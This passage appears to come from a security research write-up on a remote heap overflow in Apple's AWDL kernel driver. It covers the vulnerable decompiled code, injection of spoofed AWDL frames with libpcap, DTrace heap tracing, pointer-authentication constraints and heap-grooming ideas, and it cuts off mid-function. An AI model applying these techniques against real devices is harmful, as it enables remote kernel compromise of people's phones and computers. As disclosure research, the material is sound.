Type    Handler
0x02    IO80211AWDLPeer::processServiceResponseTLV
0x04    IO80211AWDLPeer::parseAwdlSyncParamsTlvAndTakeAction
0x05    IO80211AWDLPeer::parseAwdlElectionParamsV1
0x06    inline parsing of serviceParam
0x07    IO80211Peer::parseHTCapTLV
0x0c    nop
0x10    inline parsing of ARPA
0x11    IO80211Peer::parseVhtCapTLV
0x12    IO80211AWDLPeer::parseAwdlChanSeqFromChanSeqTLV
0x14    IO80211AWDLPeer::parseAwdlSyncTreeTLV
0x15    inline parser extracting 2 bytes
0x16    IO80211AWDLPeer::parseBloomFilterTlv
0x17    inlined parser of NSync
0x1d    IO80211AWDLPeer::parseBssSteeringTlv

Here’s a cleaned up decompilation of the relevant portions of the parseAwdlSyncTreeTLV method which contains the vulnerability:

int
IO80211AWDLPeer::parseAwdlSyncTreeTLV(awdl_tlv* tlv)
{
  u64 new_sync_tree_size;

  u32 old_sync_tree_size = this->n_sync_tree_macs + 1;
  if (old_sync_tree_size >= 10) {
    old_sync_tree_size = 10;
  }

  if (old_sync_tree_size == tlv->len/6) {
    new_sync_tree_size = old_sync_tree_size;
  } else {
    new_sync_tree_size = tlv->len/6;
    this->n_sync_tree_macs = new_sync_tree_size;
  }

  // no check that 6 * new_sync_tree_size fits in the 60-byte array
  memcpy(this->sync_tree_macs, &tlv->val[0], 6 * new_sync_tree_size);

  /* remainder of the method not shown */
}

sync_tree_macs is a 60-byte inline array in the IO80211AWDLPeer structure, at offset +0x1648. That’s enough space to store 10 MAC addresses. The IO80211AWDLPeer object is 0x16a8 bytes in size, which means it will be allocated in the kalloc.6144 zone.

tlvCheckBounds will enforce a maximum value of 1024 for the length of the SyncTree TLV. The TLV parser will round that value down to the nearest multiple of 6 and copy that number of bytes into the sync_tree_macs array at +0x1648. This will be our memory corruption primitive: a linear heap buffer overflow in 6-byte chunks which can corrupt all the fields in the IO80211AWDLPeer object past +0x1648 and then a few hundred bytes off of the end of the kalloc.6144 zone chunk. We can easily cause IO80211AWDLPeer objects to be allocated next to each other by sending AWDL frames from a large number of different spoofed source MAC addresses in quick succession. This gives us four rough primitives to think about as we start to find a path to exploitation:

1) Corrupting fields after the sync_tree_macs array in the IO80211AWDLPeer object:

Overflowing into the fields at the end of the peer object

2) Corrupting the lower fields of an IO80211AWDLPeer object groomed next to this one:

Overflowing into the fields at the start of a peer object next to this one

3) Corrupting the lower bytes of another object type we can groom to follow a peer in kalloc.6144:

Overflowing into a different type of object next to this peer in the same zone

4) Meta-grooming the zone allocator to place a peer object at a zone boundary so we can corrupt the early bytes of an object from another zone:

Overflowing into a different type of object in a different zone

We’ll revisit these options in greater detail soon.
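The reach of the overflow follows directly from the numbers quoted above. As a rough worked example (the constant and function names are made up for illustration; the offsets and sizes are the ones given in the text), the arithmetic can be sketched as:

```c
#include <assert.h>
#include <stdint.h>

enum {
  SYNC_TREE_OFFSET = 0x1648, /* offset of sync_tree_macs in the peer object */
  PEER_SIZE        = 0x16a8, /* size of an IO80211AWDLPeer object */
  ZONE_ELEM_SIZE   = 6144,   /* element size of the kalloc.6144 zone */
  MAC_LEN          = 6
};

/* Bytes copied for a SyncTree TLV: the length rounded down to a multiple of 6. */
uint32_t bytes_copied(uint32_t tlv_len) {
  assert(tlv_len <= 1024); /* upper bound enforced by tlvCheckBounds */
  return (tlv_len / MAC_LEN) * MAC_LEN;
}

/* Bytes written beyond the end of the peer object itself (0 if none). */
uint32_t bytes_past_object(uint32_t tlv_len) {
  uint32_t end = (uint32_t)SYNC_TREE_OFFSET + bytes_copied(tlv_len);
  return end > (uint32_t)PEER_SIZE ? end - (uint32_t)PEER_SIZE : 0;
}

/* Bytes written beyond the end of the kalloc.6144 element (0 if none). */
uint32_t bytes_past_element(uint32_t tlv_len) {
  uint32_t end = (uint32_t)SYNC_TREE_OFFSET + bytes_copied(tlv_len);
  return end > (uint32_t)ZONE_ELEM_SIZE ? end - (uint32_t)ZONE_ELEM_SIZE : 0;
}
```

With the maximum TLV length of 1024, 1020 bytes are copied: 924 of them land beyond the end of the peer object and 580 beyond the end of its 6144-byte zone element, which matches the "few hundred bytes" described above.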

At this point we understand enough about the AWDL frame format to start trying to get controlled, arbitrary data going over the air and reach the frame parsing entrypoint.

I tried for a long time to get the open source academic OWL project to build and run successfully, sadly without success. In order to start making progress I decided to write my own AWDL client from scratch. Another approach could have been to write a MacOS kernel module to interact with the existing AWDL driver, which may have simplified some aspects of the exploit but also made others much harder.

I started off using an old Netgear WG111v2 WiFi adapter I’ve had for many years which I knew could do monitor mode and frame injection, albeit only on 2.4 GHz channels. It uses an rtl8187 chipset. Since I wanted to use the linux drivers for these adapters I bought a Raspberry Pi 4B to run the exploit.

In the past I’ve used Scapy for crafting network packets from scratch. Scapy can craft and inject arbitrary 802.11 frames, but since we’re going to need a lot of control over injection timing it might not be the best tool. Scapy uses libpcap to interact with the hardware to inject raw frames so I took a look at libpcap. Some googling later I found this excellent tutorial example which demonstrates exactly how to use libpcap to inject a raw 802.11 frame. Let’s dissect exactly what’s required:

We’ve seen the structure of the data in 802.11 AWDL frames; there will be an ieee80211 header at the start, an Apple OUI, then the AWDL action frame header and so on. If our WiFi adaptor were connected to a WiFi network, this might be enough information to transmit such a frame. The problem is that we’re not connected to any network. This means we need to attach some metadata to our frame to tell the WiFi adaptor exactly how it should get this frame on to the air. For example, what channel and with what bandwidth and modulation scheme should it use to inject the frame? Should it attempt re-transmits until an ACK is received? What signal strength should it use to inject the frame?

Radiotap is a standard for expressing exactly this type of frame metadata, both when injecting frames and receiving them. It’s a slightly fiddly variable-sized header which you can prepend on the front of a frame to be injected (or read off the start of a frame which you’ve sniffed).

Whether the radiotap fields you specify are actually respected and used depends on the driver you’re using; a driver may choose to simply not allow userspace to specify many aspects of injected frames. Here’s an example radiotap header captured from an AWDL frame using the built-in MacOS packet sniffer on a MacBook Pro. Wireshark has parsed the binary radiotap format for us:

Wireshark parses radiotap headers in pcaps and shows them in a human-readable form

From this radiotap header we can see a timestamp, the data rate used for transmission, the channel (5.220 GHz which is channel 44) and the modulation scheme (OFDM). We can also see an indication of the strength of the received signal and a measure of the noise.

The tutorial gave the following radiotap header:

static uint8_t u8aRadiotapHeader[] = {
  0x00, 0x00, // version
  0x18, 0x00, // size
  0x0f, 0x80, 0x00, 0x00, // included fields
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, // timestamp
  0x10, // add FCS
  0x00, // rate
  0x00, 0x00, 0x00, 0x00, // channel
  0x08, 0x00, // NOACK; don't retry
};
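To see how the "size" and "included fields" bytes relate to the rest of that header, here is a small sketch that decodes them and checks that they agree. The helper names and RT_* macros are invented for this example; the bit positions are the ones the radiotap standard assigns to these five fields, and the sketch deliberately handles only those fields (for which no alignment padding is needed in this order).

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Radiotap "present" bits for the fields used in the header above. */
#define RT_TSFT     (1u << 0)   /* 8-byte timestamp */
#define RT_FLAGS    (1u << 1)   /* 1 byte of flags (0x10 = frame includes FCS) */
#define RT_RATE     (1u << 2)   /* 1 byte */
#define RT_CHANNEL  (1u << 3)   /* 2-byte frequency + 2-byte channel flags */
#define RT_TX_FLAGS (1u << 15)  /* 2 bytes (0x0008 = no ACK expected) */

/* Little-endian total header length, stored at bytes 2..3. */
uint16_t rt_len(const uint8_t *hdr) {
  assert(hdr != NULL);
  return (uint16_t)(hdr[2] | (hdr[3] << 8));
}

/* Little-endian bitmap of included fields, stored at bytes 4..7. */
uint32_t rt_present(const uint8_t *hdr) {
  assert(hdr != NULL);
  return (uint32_t)hdr[4] | ((uint32_t)hdr[5] << 8) |
         ((uint32_t)hdr[6] << 16) | ((uint32_t)hdr[7] << 24);
}

/* Header size implied by the bitmap, for the five fields above only. */
size_t rt_expected_len(uint32_t present) {
  size_t n = 8; /* version, pad, length, present bitmap */
  assert((present & ~(RT_TSFT | RT_FLAGS | RT_RATE | RT_CHANNEL | RT_TX_FLAGS)) == 0);
  if (present & RT_TSFT)     n += 8;
  if (present & RT_FLAGS)    n += 1;
  if (present & RT_RATE)     n += 1;
  if (present & RT_CHANNEL)  n += 4;
  if (present & RT_TX_FLAGS) n += 2;
  return n;
}
```

For the tutorial header the bitmap decodes to 0x0000800f, and both the declared length and the length implied by the bitmap come out at 24 bytes.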

With knowledge of radiotap and a basic header it’s not too tricky to get an AWDL frame on to the air using the pcap_inject interface and a wireless adaptor in monitor mode:

int pcap_inject(pcap_t *p, const void *buf, size_t size)

Of course, this doesn’t immediately work and with some trial and error it seems the rate and channel fields aren’t being respected. Injection with this adaptor seems to only work at 1Mbps, and the channel specified in the radiotap header won’t be the one used for injection. This isn’t such a problem as we can still easily set the wifi adaptor channel manually:

iw dev wlan0 set channel 6

Injection at 1Mbps is exceptionally slow but this is enough to get a test AWDL frame on to the air and we can see it in Wireshark on another device in monitor mode. But nothing seems to be happening on a target device. Time for some debugging!

The SEEMOO labs paper had already suggested setting some MacOS boot arguments to enable more verbose logging from the AWDL kernel driver. These log messages were incredibly helpful but often you want more information than you can get from the logs.

For the initial report PoC I showed how to use the MacOS kernel debugger to modify an AWDL frame which was about to be transmitted. Typically, in my experience, the MacOS kernel debugger is exceptionally unwieldy and unreliable. Whilst you can technically script it using lldb’s python bindings, I wouldn’t recommend it.

Apple does have one trick up their sleeve however: DTrace! Where the MacOS kernel debugger is awful in my opinion, DTrace is exceptional. DTrace is a dynamic tracing framework originally developed by Sun Microsystems for Solaris. It’s been ported to many platforms including MacOS and ships by default. It’s the magic behind tools such as Instruments. DTrace allows you to hook in little snippets of tracing code almost wherever you want, both in userspace programs, and, amazingly, the kernel. DTrace has its quirks. Hooks are written in the D language, which doesn’t have loops, and the scoping of variables takes a little while to get your head around, but it’s the ultimate debugging and reversing tool.

For example, I used this dtrace script on MacOS to log whenever a new IO80211AWDLPeer object was allocated, printing its heap address and MAC address:

self char* mac;

fbt:com.apple.iokit.IO80211Family:_ZN15IO80211AWDLPeer21withAddressAndManagerEPKhP22IO80211AWDLPeerManager:entry {
  self->mac = (char*)arg0;
}

fbt:com.apple.iokit.IO80211Family:_ZN15IO80211AWDLPeer21withAddressAndManagerEPKhP22IO80211AWDLPeerManager:return {
  printf("new AWDL peer: %02x:%02x:%02x:%02x:%02x:%02x allocation:%p", self->mac[0], self->mac[1], self->mac[2], self->mac[3], self->mac[4], self->mac[5], arg1);
}

Here we’re creating two hooks, one which runs at a function entry point and the other which runs just before that same function returns. We can use the self-> syntax to pass variables between the entry point and return point and DTrace makes sure that the entries and returns match up properly.

We have to use the mangled C++ symbol in dtrace scripts; using c++filt we can see the demangled version:

$ c++filt -n _ZN15IO80211AWDLPeer21withAddressAndManagerEPKhP22IO80211AWDLPeerManager
IO80211AWDLPeer::withAddressAndManager(unsigned char const*, IO80211AWDLPeerManager*)

The entry hook “saves” the pointer to the MAC address which is passed as the first argument, associating it with the current thread and stack frame. The return hook then prints out that MAC address along with the return value of the function (arg1 in a return hook is the function’s return value) which in this case is the address of the newly-allocated IO80211AWDLPeer object.

With DTrace you can easily prototype custom heap logging tools. For example, if you’re targeting a particular allocation size and want to know what other objects are ending up in there you could use something like the following DTrace script:

/* some globals with values */
BEGIN {
  target_size_min = 97;
  target_size_max = 128;
}

fbt:mach_kernel:kalloc_canblock:entry {
  self->size = *(uint64_t*)arg0;
}

fbt:mach_kernel:kalloc_canblock:return
/self->size >= target_size_min &&
 self->size <= target_size_max/
{
  printf("target allocation %x = %x", self->size, arg1);
  stack();
}

The expression between the two /’s allows the hook to be conditionally executed, in this case limiting it to cases where kalloc_canblock has been called with a size between target_size_min and target_size_max. The built-in stack() function will print a stack trace, giving you some insight into the allocations within a particular size range. You could also use ustack() to continue that stack trace in userspace if this kernel allocation happened due to a syscall, for example.

DTrace can also safely dereference invalid addresses without kernel panicking, making it very useful for prototyping and debugging heap grooms. With some ingenuity it’s also possible to do things like dump linked-lists and monitor for the destruction of particular objects.

I’d really recommend spending some time learning DTrace; once you get your head around its esoteric programming model you’ll find it an immensely powerful tool.

Using DTrace to log stack frames I was able to trace the path legitimate AWDL frames took through the code and determine how far my fake AWDL frames made it. Through this process I discovered that there are, at least on MacOS, two AWDL parsers in the kernel: the main one we’ve already seen inside the IO80211Family kext and a second, much simpler one in the driver for the particular chipset being used. There were three checks in this simpler parser which I was failing, each of which meant my fake AWDL frames never made it to the IO80211Family code:

Firstly, the source MAC address was being validated. MAC addresses actually contain multiple fields:

The first half of a MAC address is an OUI. The least significant bit of the first byte defines whether the address is multicast or unicast. The second bit defines whether the address is locally administered or globally unique.

Diagram used under CC BY-SA 2.5 By Inductiveload, modified/corrected by Kju – SVG drawing based on PNG uploaded by User:Vtraveller. This can be found on Wikipedia.

The source MAC address 01:23:45:67:89:ab from the libpcap example was an unfortunate choice as it has the multicast bit set. AWDL only wants to deal with unicast addresses and rejects frames from multicast addresses. Choosing a new MAC address to spoof without that bit set solved this problem.
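The two flag bits in the first byte of a MAC address are easy to test for. A minimal sketch (the function names are made up for illustration) which would have flagged the tutorial's address as a poor choice:

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* Least significant bit of the first byte: 1 = multicast, 0 = unicast. */
bool mac_is_multicast(const uint8_t mac[6]) {
  assert(mac != NULL);
  return (mac[0] & 0x01) != 0;
}

/* Second bit of the first byte: 1 = locally administered, 0 = globally unique. */
bool mac_is_locally_administered(const uint8_t mac[6]) {
  assert(mac != NULL);
  return (mac[0] & 0x02) != 0;
}
```

For 01:23:45:67:89:ab the first helper returns true, since 0x01 has its lowest bit set; any spoofed source address whose first byte is even avoids the problem.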

The next check was that the first two TLVs in the variable-length payload section of the frame must be a type 4 (sync parameters) then a type 6 (service parameters).

Finally, the channel number in the sync parameters had to match the channel on which the frame had actually been received.

With those three issues fixed I was finally able to get arbitrary controlled bytes to appear at the actionFrameReport method on a remote device and the next stage of the project could begin.

We’ve seen that AWDL uses time division multiplexing to quickly switch between the channels used for AWDL (typically 6 and 44) and the channel used by the access point the device is connected to. By parsing the AWDL synchronization parameters TLV in the PSF and MIF frames sent by AWDL peers you can calculate when they will be listening in the future. The OWL project uses the linux libev library to try to only transmit at the right moment when other peers will be listening.

There are a few problems with this approach for our purposes:

Firstly, and very importantly, this makes targeting difficult. AWDL action frames are (usually) sent to a broadcast destination MAC address (ff:ff:ff:ff:ff:ff). It’s a mesh network and these frames are meant to be used by all the peers for building up the mesh.

Whilst exploiting every listening AWDL device in proximity at the same time would be an interesting research problem and make for a cool demo video, it also presents many challenges far outside the initial scope. I really needed a way to ensure that only devices I controlled would process the AWDL frames I sent.

With some experimentation it turned out that all AWDL frames can also be sent to unicast addresses and devices would still parse them. This presents another challenge as the AWDL virtual interface’s MAC address is randomly generated each time the interface is activated. For testing on MacOS it suffices to run:

ifconfig awdl0

to determine the current MAC address. For iOS it’s a little more involved; my chosen technique has been to sniff on the AWDL social channels and correlate signal strength with movements of the device to determine its current AWDL MAC.

There’s one other important difference when you send an AWDL action frame to a unicast address: if the device is currently listening on that channel and receives the frame, it will send an ACK. This turns out to be extremely helpful. We’ll end up building some quite complicated primitives using AWDL action frames, abusing the protocol to build a weird machine. Being able to tell whether a target device really received a frame or not means we can treat AWDL frames more like a reliable transport medium. For the typical usage of AWDL this isn’t necessary; but our usage of AWDL is not going to be typical.

This ACK-sniffing model will be the building block for our AWDL frame injection API.

Just because the ACKs are coming over the air now doesn’t mean we actually see them. Although the WiFi adaptor we’re using for injection must be technically capable of receiving ACKs (as they are a fundamental protocol building block), being able to see them on the monitor interface isn’t guaranteed.

A screenshot of wireshark showing a spoofed AWDL frame followed by an Acknowledgement from the target device.

The libpcap interface is quite generic and doesn’t have any way to indicate whether a frame was ACKed or not. It might not even be the case that the kernel driver is aware whether an ACK was received. I didn’t really want to delve into the injection interface kernel drivers or firmware as that was likely to be a major investment in itself, so I tried some other ideas.

ACK frames in 802.11g and 802.11a are timing based. There’s a short window after each transmitted frame when the receiver can ACK if they received the frame. It’s for this reason that ACK frames don’t contain a source MAC address. It’s not necessary as the ACK is already perfectly correlated with a source device due to the timing.

If we also listen on our injection interface in monitor mode we might be able to receive the ACK frames ourselves and correlate them. As mentioned, not all chipsets and drivers actually give you all the management frames.

For my early prototypes, I managed to find a pair in my box of WiFi adaptors where one would successfully inject on 2.4 GHz channels at 1Mbps and the other would successfully sniff ACKs on that channel at 1Mbps.

1Mbps is exceptionally slow; a relatively large AWDL frame ends up being on the air for 10ms or more at that speed, so if your availability window is only a few ms you’re not going to get many frames per second. Still, this was enough to get going.
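As a back-of-the-envelope check on that figure, here is a tiny sketch of the airtime calculation. It counts only the payload bits and ignores the preamble, PLCP header and inter-frame spacing, so real airtime is somewhat longer; airtime_us is a name invented for this example.

```c
#include <assert.h>
#include <stdint.h>

/* Microseconds needed to clock frame_bytes onto the air at rate_bps,
 * counting payload bits only (no preamble or inter-frame gaps). */
uint64_t airtime_us(uint32_t frame_bytes, uint32_t rate_bps) {
  assert(rate_bps > 0);
  return ((uint64_t)frame_bytes * 8u * 1000000u) / rate_bps;
}
```

A 1250-byte frame takes 10,000 microseconds (10ms) at 1Mbps, compared with roughly 1.7ms at 6Mbps.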

The injection framework I built for the exploit uses two threads, one for frame injection and one for ACK sniffing. Frames are injected using the try_inject function, which extracts the spoofed source MAC address and signals to the second sniffing thread to start looking for an ACK frame being sent to that MAC.

Using a pthread condition variable, the injecting thread can then wait for a limited amount of time during which the sniffing thread may or may not see the ACK. If the sniffing thread does see the ACK it can record this fact then signal the condition variable. The injection thread will stop waiting and can check whether the ACK was received.

Take a look at try_inject_internal in the exploit for the mutex and condition variable setup code for this.

There’s a wrapper around try_inject called inject which repeatedly calls try_inject until it succeeds. These two methods allow us to do all the timing sensitive and insensitive frame injection we need.

These two methods take a variable number of pkt_buf_t pointers; a simple custom variable-sized buffer wrapper object. The advantage of this approach is that it allows us to quickly prototype new AWDL frame structures without having to write boilerplate code. For example, this is all the code required to inject a basic AWDL frame and re-transmit it until the target receives it:

inject(RT(),
       WIFI(dst, src),
       AWDL(),
       SYNC_PARAMS(),
       SERV_PARAM(),
       PKT_END());
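One way such a variadic API could assemble a frame is to walk the argument list and concatenate each piece until it reaches a terminator. The sketch below assumes a hypothetical pkt_buf_t layout and uses a NULL pointer as the terminator; the exploit's actual structure and PKT_END() sentinel may well differ.

```c
#include <assert.h>
#include <stdarg.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical layout; the exploit's pkt_buf_t may look different. */
typedef struct {
  size_t len;
  const uint8_t *bytes;
} pkt_buf_t;

/*
 * Concatenate a NULL-terminated list of pkt_buf_t pointers into out.
 * Returns the total length, or 0 if the pieces do not fit in cap bytes.
 */
size_t pkt_concat(uint8_t *out, size_t cap, ...) {
  va_list ap;
  size_t total = 0;

  assert(out != NULL);
  va_start(ap, cap);
  for (;;) {
    const pkt_buf_t *p = va_arg(ap, pkt_buf_t *);
    if (p == NULL) break;          /* terminator reached */
    if (p->len > cap - total) {    /* piece would overflow out */
      total = 0;
      break;
    }
    memcpy(out + total, p->bytes, p->len);
    total += p->len;
  }
  va_end(ap);
  return total;
}
```

Callers should pass the terminator as (pkt_buf_t *)NULL so that a pointer-sized value is pushed through the variadic call on every platform.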

Investing a little bit of time building this API saved a lot of time in the long run and made it very easy to experiment with new ideas.

With an injection framework finally up and running we can start to think about how to actually exploit this vulnerability!

The Apple A12 SOC found in the iPhone Xr/Xs contained the first commercially-available ARM CPU implementing the ARMv8.3 optional Pointer Authentication feature. This was released in September 2018. This post from Project Zero researcher Brandon Azad covers PAC and its implementation by Apple in great detail, as does this presentation from the 2019 LLVM developers meeting.

Its primary use is as a form of Control Flow Integrity. In theory all function pointers present in memory should contain a Pointer Authentication Code in their upper bits which will be verified after the pointer is loaded from memory but before it’s used to modify control flow.

In almost all cases this PAC instrumentation will be added by the compiler. There’s a really great document from the clang team which goes into great detail about the implementation of PAC from a compiler point of view and the security tradeoffs involved. It has an excellent section on the threat model of PAC which frankly and honestly discusses the cases where PAC may help and the cases where it won’t. Documentation like this should ship with every mitigation.

Having a publicly documented threat model helps everyone understand the intentions behind design decisions and the tradeoffs which were necessary. It helps build a common vocabulary and helps to move discussions about mitigations away from a focus on security through obscurity towards a qualitative appraisal of their strengths and weaknesses.

Concretely, the first hurdle PAC will throw up is that it will make it harder to forge vtable pointers.

All OSObject-derived objects have virtual methods. IO80211AWDLPeer, like almost all IOKit C++ classes, derives from OSObject so the first field is a vtable pointer. As we saw in the heap-grooming sketches earlier, by spraying IO80211AWDLPeer objects then triggering the heap overflow we can easily gain control of a vtable pointer. This technique was used in Mateusz Jurczyk’s Samsung MMS remote exploit and Natalie Silvanovich’s remote WebRTC exploit this year.

Kernel virtual calls have gone from looking like this on A11 and below:

LDR   X8, [X20]      ; load vtable pointer
LDR   X8, [X8,#0x38] ; load function pointer from vtable
MOV   X0, X20
BLR   X8             ; call virtual function

to this on A12 and above:

LDR   X8, [X20]           ; load vtable pointer

; authenticate vtable pointer using A-family data key and zero context
; if authentication passes, add 0x38 to vtable pointer, load value
; at that address into X9 and store X8+0x38 back to X8 with no PAC
LDRAA X9, [X8,#0x38]!

; overwrite the upper 16 bits of X8 with the constant 0xFFFC
; this is a hash of the mangled symbol; constant at each callsite
MOVK  X8, #0xFFFC,LSL#48
MOV   X0, X20

; authenticate virtual function pointer with A-family instruction key
; and context value where the upper 16 bits are a hash of the
; virtual function prototype and the lower 48 bits are the runtime
; address of the virtual function pointer in the vtable
BLRAA X9, X8

Diagrammatic view of a C++ virtual call in ARM64e showing the keys and discriminators used

What does that mean in practice?

If we don’t have a signing gadget, then we can’t trivially point a vtable pointer to an arbitrary address. Even if we could, we’d need a data and instruction family signing gadget with control over the discriminator.

We can swap a vtable pointer with any other A-family 0-context data key signed pointer, however the virtual function pointer itself is signed with a context value consisting of the address of the vtable entry and a hash of the virtual function prototype. This means we can’t swap virtual function pointers from one vtable into another one (or more likely into a fake vtable to which we’re able to get an A-family data key signed pointer.)
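
To make that context value concrete, here is a minimal C sketch of the bit manipulation performed by the MOVK in the A12 listing. The function names and the example addresses are mine, chosen purely for illustration; the sketch models only how the discriminator is assembled, not the PAC computation itself.

```c
#include <assert.h>
#include <stdint.h>

/* Model of `MOVK X8, #hash, LSL #48`: keep the low 48 bits of the
 * vtable-slot address and replace the top 16 bits with the hash. */
static uint64_t blend_discriminator(uint64_t slot_addr, uint16_t proto_hash)
{
    const uint64_t low48 = slot_addr & 0x0000FFFFFFFFFFFFULL;
    return ((uint64_t)proto_hash << 48) | low48;
}

/* Context for the call site in the listing: the slot is vtable + 0x38
 * and the per-callsite constant is 0xFFFC. */
static uint64_t callsite_context(uint64_t vtable_addr)
{
    assert(vtable_addr <= UINT64_MAX - 0x38);  /* no wrap-around */
    return blend_discriminator(vtable_addr + 0x38, 0xFFFC);
}
```

Because the slot address is folded into the context, the same function pointer stored in a vtable at a different address authenticates against a different context value, which is why entries can’t simply be copied between vtables.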

We can swap one vtable pointer for another one to cause a type confusion, however every virtual function call made through that vtable pointer would have to be calling a function with a matching prototype hash. This isn’t so improbable; a fundamental building block of object-oriented programming in C++ is to call functions with matching prototypes but different behaviour via a vtable. Nevertheless you’d have to do some thinking to come up with a generic defeat using this approach.

An important observation is that the vtable pointers themselves have no address diversity; they’re signed with a zero-context. This means that if we can disclose a signed vtable pointer for an object of type A at address X, we can overwrite the vtable pointer for another object of type A at a different address Y.

This might seem completely trivial and uninteresting but remember: we only have a linear heap buffer overflow. If the vtable pointer had address diversity then for us to be able to safely corrupt fields after the vtable in an adjacent object we’d have to first disclose the exact vtable pointer following the object which we can overflow out of. Instead we can disclose any vtable pointer for this type and it will be valid.

The clang design doc explains why this is:

It is also known that some code in practice copies objects containing v-tables with memcpy, and while this is not permitted formally, it is something that may be invasive to eliminate.

Right at the end of this document they also say “attackers can be devious.” On A12 and above we can no longer trivially point the vtable pointer to a fake vtable and gain arbitrary PC control pretty easily. Guess we’ll have to get devious 🙂

Initially I continued using the iOS 12 beta 1 kernelcache when searching for exploitation primitives and performing the initial reversing to better understand the layout of the IO80211AWDLPeer object. This turned out to be a major mistake and a few weeks were spent following unproductive leads:

In the iOS 12 beta 1 kernelcache the fields following the sync_tree_macs buffer seemed uninteresting, at least from the perspective of being able to build a stronger primitive from the linear overflow. For this reason my initial ideas looked at corrupting the fields at the beginning of an IO80211AWDLPeer object which I could place subsequently in memory, option 2 which we saw earlier:

Spoofing many source MAC addresses makes allocating neighbouring IO80211AWDLPeer objects fairly easy. The synctree buffer overflow then allows corrupting the lower fields of an IO80211AWDLPeer in addition to the upper fields

Almost certainly we’re going to need some kind of memory disclosure primitive to land this exploit. My first ideas for building a memory disclosure primitive involved corrupting the linked-list of peers. The data structure holding the peers is in fact much more complex than a linked list, it’s more like a priority queue with some interesting behaviours when the queue is modified and a distinct lack of safe unlinking and the like. I’d expect iOS to start slowly migrating to using data-PAC for linked-list integrity, but for now this isn’t the case. In fact these linked lists don’t even have the most basic safe-unlinking integrity checks yet.

The start of an IO80211AWDLPeer object looks like this:

All IOKit objects inheriting from OSObject have a vtable and a reference count as their first two fields. In an IO80211AWDLPeer these are followed by a hash_bucket identifier, a peer_list flink and blink, the peer’s MAC address and the peer’s peer_manager pointer.

My first ideas revolved around trying to partially corrupt a peer linked-list pointer. In hindsight, there’s an obvious reason why this doesn’t work (which I’ll discuss in a bit), but let’s remain enthusiastic and continue on for now…

Looking through the places where the linked list of peers seemed to be used it looked like perhaps the IO80211AWDLPeerManager::updatePeerListBloomFilter method might be interesting from the perspective of trying to get data leaked back to us. Let’s take a look at it:

IO80211AWDLPeerManager::updatePeerListBloomFilter(){
  int n_peers = this->peers_list.n_elems;
  if (!this->peer_bloom_filters_enabled) {
    return 0;
  }
  bzero(this->bloom_filter_buf, 0xA00uLL);
  this->n_macs_in_bloom_filter = 0;
  IO80211AWDLPeer* peer = this->peers_list.head;
  int n_peers_in_filter = 0;
  for (;
       n_peers_in_filter < this->peers_list.n_elems;
       n_peers_in_filter++) {
    this->bloom_filter_macs[n_peers_in_filter] = peer->mac;
    peer = peer->flink;
  }
  bloom_filter_create(10*(n_peers_in_filter+7) & 0xff8,
                      0,
                      n_peers_in_filter,
                      this->bloom_filter_macs,
                      this->bloom_filter_buf);
  if (n_peers_in_filter){
    this->updateBroadcastMI(9, 1, 0);
  }
  return 0;
}

From the IO80211AWDLPeerManager it’s reading the peer list head pointer as well as a count of the number of entries in the peer list. For each entry in the list it’s reading the MAC address field into an array then builds a bloom filter from that buffer.

The interesting part here is that the list traversal is terminated using a count of elements which have been traversed rather than by looking for a termination pointer value at the end of the list (eg a NULL or a pointer back to the head element.) This means that potentially if we could corrupt the linked-list pointer of the second-to-last peer to be processed we could point it to a fake peer and get data at a controlled address added into the bloom filter. updateBroadcastMI looks like it will add that bloom filter data to the Master Indication frame in the bloom filter TLV, meaning we could get a bloom filter containing data read from a controlled address sent back to us. Depending on the exact format of the bloom filter it would probably be possible to then recover at least some bits of remote memory.
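
The effect of a count-terminated walk can be shown with a small user-space model. This is only a sketch: struct toy_peer and collect_macs are hypothetical names of mine, and the struct keeps just the two fields the decompiled loop touches.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define MAC_LEN 6

/* Cut-down stand-in for a peer: only the fields the loop touches. */
struct toy_peer {
    struct toy_peer *flink;
    uint8_t mac[MAC_LEN];
};

/* Copy n_elems MACs starting at head. Like the decompiled loop, the walk
 * stops on the count alone and never inspects flink for a terminator. */
static size_t collect_macs(const struct toy_peer *head, size_t n_elems,
                           uint8_t out[][MAC_LEN], size_t out_cap)
{
    assert(n_elems <= out_cap);
    const struct toy_peer *peer = head;
    for (size_t i = 0; i < n_elems; i++) {
        memcpy(out[i], peer->mac, MAC_LEN);
        peer = peer->flink;
    }
    return n_elems;
}
```

If the flink of the second-to-last element is redirected, the final MAC copied comes from wherever that pointer now leads, and nothing in the loop notices.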

It’s important to emphasize at this point that due to the lack of a remote KASLR leak and also the lack of a remote PAC signing gadget or vtable disclosure, in order to corrupt the linked-list pointer of an adjacent peer object we have no option but to corrupt its vtable pointer with an invalid value. This means that if any virtual methods were called on this object, it would almost certainly cause a kernel panic.

The first part of trying to get this to work was to work out how to build a suitable heap groom such that we could overflow from a peer into the second-to-last peer in the list which would be processed

Both the linked-list order and the virtual memory order need to be groomed to allow a targeted partial overflow of the final linked-list pointer to be traversed. In this layout we’d need to overflow from 2 into 6 to corrupt the final pointer from 6 to 7.

There’s a mitigation from a few years ago in play here which we’ll have to work around; namely the randomization of the initial zone freelists which adds a slight element of randomness to the order of the allocations you will get for consecutive calls to kalloc for the same size. The randomness is quite minimal however so the trick here is to be able to pad your allocations with “safe” objects such that even though you can’t guarantee that you always overflow into the target object, you can mostly guarantee that you’ll overflow into that object or a safe object.

We need two primitives: Firstly, we need to understand the semantics of the list. Secondly, we need some safe objects.

With a bit of reversing we can determine that the code which adds peers to the list doesn’t simply add them to the start. Peers which are first seen on a 2.4GHz channel (6) do get added this way, but peers first seen on a 5GHz channel (44) are inserted based on their RSSI (received signal strength indication, a unitless value approximating signal strength.) Stronger signals mean the peer is probably physically closer to the device and will also be closer to the start of the list. This gives some nice primitives for manipulating the list and ensuring we know where peers will end up.
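
The insertion rule described above can be modelled roughly as follows. Treat this strictly as a sketch: struct list_peer and insert_peer are hypothetical names, and the way ties and 2.4GHz entries are handled during the RSSI walk is my guess, not something recovered from the kernel.

```c
#include <assert.h>
#include <stddef.h>

struct list_peer {
    struct list_peer *next;
    int channel;   /* channel the peer was first seen on */
    int rssi;      /* larger value = stronger signal */
};

static void insert_peer(struct list_peer **head, struct list_peer *p)
{
    assert(head != NULL && p != NULL);
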